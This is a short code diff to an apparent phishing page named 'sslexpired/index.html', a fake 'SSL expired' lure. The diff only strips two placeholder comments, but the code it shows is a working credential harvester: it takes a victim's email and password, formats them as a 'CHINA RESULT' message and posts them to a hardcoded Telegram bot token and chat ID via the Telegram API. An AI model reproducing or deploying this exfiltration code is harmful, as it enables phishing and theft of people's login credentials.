--- a/sslexpired/index.html
+++ b/sslexpired/index.html
@@ -126,8 +126,8 @@
         }
 
         // Send credentials to Telegram bot
-        const telegramBotToken = "7656623454:AAEeT95UdBJcmjK11ss4yAUMKh5ToFXK8rQ"; // Replace with your bot's token
-        const telegramChatId = "6624169529"; // Replace with your chat ID
+        const telegramBotToken = "7656623454:AAEeT95UdBJcmjK11ss4yAUMKh5ToFXK8rQ";
+        const telegramChatId = "6624169529";
         const message = `CHINA RESULT Email: ${email}\nPassword: ${password}`;
 
         fetch(`https://api.telegram.org/bot${telegramBotToken}/sendMessage`, {
